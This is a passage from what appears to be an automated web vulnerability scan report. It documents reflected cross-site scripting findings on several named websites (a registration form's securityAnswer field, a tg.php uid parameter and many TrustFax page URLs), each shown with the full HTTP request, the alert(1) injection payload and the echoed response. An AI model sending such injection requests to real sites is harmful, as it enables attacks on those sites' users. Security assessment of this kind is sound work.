User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.%0068c91<script>alert(1)</script>098861a2c93&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+firs
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<option>Mr..68c91<script>alert(1)</script>098861a2c93</option>
...[SNIP]...

1.28. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [securityAnswer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the securityAnswer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33a2"><script>alert(1)</script>9812603d467 was submitted in the securityAnswer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456b33a2"><script>alert(1)</script>9812603d467&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:58 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="securityAnswer" value="546456b33a2"><script>alert(1)</script>9812603d467" size="56" maxlength="64" tabindex="19"/>
...[SNIP]...

1.29. http://www.seeos.com/tg.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /tg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af94'%3balert(1)//b211e4f043c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4af94';alert(1)//b211e4f043c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=8/4af94'%3balert(1)//b211e4f043c9d07 HTTP/1.1
Host: www.seeos.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/?f
Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:14:19 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1713
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=8/4af94';alert(1)//b211e4f043c9d07&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.30. http://www.seeos.com/tg.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc55'%3balert(1)//f9ffbc10fbd was submitted in the uid parameter. This input was echoed as 4bc55';alert(1)//f9ffbc10fbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=www4e75df0eb30884.963191084bc55'%3balert(1)//f9ffbc10fbd&src=&cat=travel&kw=See+OS&sc=travel HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=www4e75df0eb30884.96319108

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:47 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1750
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=www4e75df0eb30884.963191084bc55';alert(1)//f9ffbc10fbd&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.31. http://www.trustfax.com/Privacy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /Privacy.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd was submitted in the REST URL parameter 1. This input was echoed as e4364--><img src=a onerror=alert(1)>86fda6cabfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Privacy.htmle4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 31442
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/Privacy"
cache key = "/trustfax/content/Privacy.htmle4364--><img src=a onerror=alert(1)>86fda6cabfd.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "Privacy"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.000"
-->
...[SNIP]...

1.32. http://www.trustfax.com/about.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 was submitted in the REST URL parameter 1. This input was echoed as 6ca76--><img src=a onerror=alert(1)>93deddcf36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /about.html6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9643
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
ug Info
id = "TPA2T10"
skin = ""
title = "About TrustFax - Online Internet Fax Broadcasting Service Provider"
handle = "/trustfax/content/about"
cache key = "/trustfax/content/about.html6ca76--><img src=a onerror=alert(1)>93deddcf36.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "about"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.577"
-->
...[SNIP]...

1.33. http://www.trustfax.com/contact.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec was submitted in the REST URL parameter 1. This input was echoed as d331f--><img src=a onerror=alert(1)>e7dbabbc8ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contact.htmld331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9408
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Contact TrustFax for World's Best Secure Online Internet Fax Services"
handle = "/trustfax/content/contact"
cache key = "/trustfax/content/contact.htmld331f--><img src=a onerror=alert(1)>e7dbabbc8ec.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "contact"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.243"
-->
...[SNIP]...

1.34. http://www.trustfax.com/features.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /features.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 was submitted in the REST URL parameter 1. This input was echoed as 7cb6c--><img src=a onerror=alert(1)>3896b8c5ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /features.html7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 14078
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/features"
cache key = "/trustfax/content/features.html7cb6c--><img src=a onerror=alert(1)>3896b8c5ad8.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "features"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.953"
-->
...[SNIP]...

1.35. http://www.trustfax.com/free_trial_30day.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /free_trial_30day.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 was submitted in the REST URL parameter 1. This input was echoed as 14b79--><img src=a onerror=alert(1)>f83294ee387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.asp14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 11488
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
o
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.asp14b79--><img src=a onerror=alert(1)>f83294ee387.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.444"
-->
...[SNIP]...

1.36. http://www.trustfax.com/free_trial_30day.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /free_trial_30day.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload deafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 was submitted in the REST URL parameter 1. This input was echoed as deafa--><img src=a onerror=alert(1)>0746bfa8dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.htmldeafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 11489
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.htmldeafa--><img src=a onerror=alert(1)>0746bfa8dd5.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.691"
-->
...[SNIP]...

1.37. http://www.trustfax.com/legalandpatent.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /legalandpatent.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 was submitted in the REST URL parameter 1. This input was echoed as c4dc4--><img src=a onerror=alert(1)>d6fa8f84920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legalandpatent.htmlc4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 15556
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/legalandpatent"
cache key = "/trustfax/content/legalandpatent.htmlc4dc4--><img src=a onerror=alert(1)>d6fa8f84920.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "legalandpatent"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.740"
-->
...[SNIP]...

1.38. http://www.trustfax.com/login.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /login.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded was submitted in the REST URL parameter 1. This input was echoed as 679b7--><img src=a onerror=alert(1)>4828928eded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /login.html679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9382
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/login"
cache key = "/trustfax/content/login.html679b7--><img src=a onerror=alert(1)>4828928eded.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "login"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.069"
-->
...[SNIP]...

1.39. http://www.trustfax.com/pricing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /pricing.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload af10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 was submitted in the REST URL parameter 1. This input was echoed as af10d--><img src=a onerror=alert(1)>0bedec460c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pricing.htmlaf10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 HTTP/1.1
Host: www.trustfax.com
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; mbox=check#true#1316364145|session#1316364084200-226831#1316365945|PC#1316364084200-226831.19#1318178486; s_cc=true; s_ev4=%5B%5B%27www.vengine.com%27%2C%271316364087271%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364087272%27%5D%5D; c_m=undefinedwww.vengine.comwww.vengine.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:43:29 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:43:29 GMT
Vary: Accept-Encoding
Content-Length: 10897
X-TWA-Web: pb:28192
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/pricing"
cache key = "/trustfax/content/pricing.htmlaf10d--><img src=a onerror=alert(1)>0bedec460c4.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "pricing"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 04:43:29.983"
-->
...[SNIP]...

1.40. http://www.trustfax.com/sitemap.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 was submitted in the REST URL parameter 1. This input was echoed as 4ee13--><img src=a onerror=alert(1)>ade44186370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap.html4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9686
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/sitemap"
cache key = "/trustfax/content/sitemap.html4ee13--><img src=a onerror=alert(1)>ade44186370.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "sitemap"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.989"
-->
...[SNIP]...

1.41. http://www.trustfax.com/support.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /support.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 was submitted in the REST URL parameter 1. This input was echoed as d2114--><img src=a onerror=alert(1)>7075d3b5727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

